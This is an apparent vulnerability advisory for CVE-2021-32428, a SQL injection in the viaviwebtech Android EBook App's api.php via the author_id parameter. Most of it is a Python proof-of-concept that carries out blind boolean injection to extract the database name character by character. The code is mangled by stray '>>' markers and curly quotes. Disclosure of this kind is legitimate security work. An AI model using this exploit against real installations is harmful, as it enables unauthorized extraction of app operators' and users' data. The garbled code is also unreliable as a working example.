Headline
CVE-2021-32428
SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php.
[+] Title: Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) [+] Author: veyselxan [+] Vendor Homepage:https://codecanyon.net/user/viaviwebtech [+] Tested on: Windows 10 [+] Versions: 10 [+] Vulnerability Type: SQL injection [+] Vulnerable Parameter: “author_id” [+] Vulnerable File: api.php [+] Cve:CVE-2021-32428 SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php. # PoC: #!/usr/bin/python3 import requests >> import sys import string url = sys.argv[1]+"api.php" >> listler = list() def exploit(xa,i): database = {’data’: >> ‘{"package_name" : >> "com.example.test","salt":"123456","sign":"7cbf2e8809bf2f671470469ec252acea","method_name":"get_author_details","author_id":"1\’ >> AND substring(database(),’+str(i)+’,1)=\’’+str(xa)+’\’-- >> veyselxan"}’} x = requests.post(url, data = database) a = >> x.json() if a[‘status’]==1: listler.append(xa) i = 1 >> yazilara = list(string.ascii_lowercase) while i < 16: for x >> in yazilara: exploit(x,i) i += 1 print(*listler, sep = “”)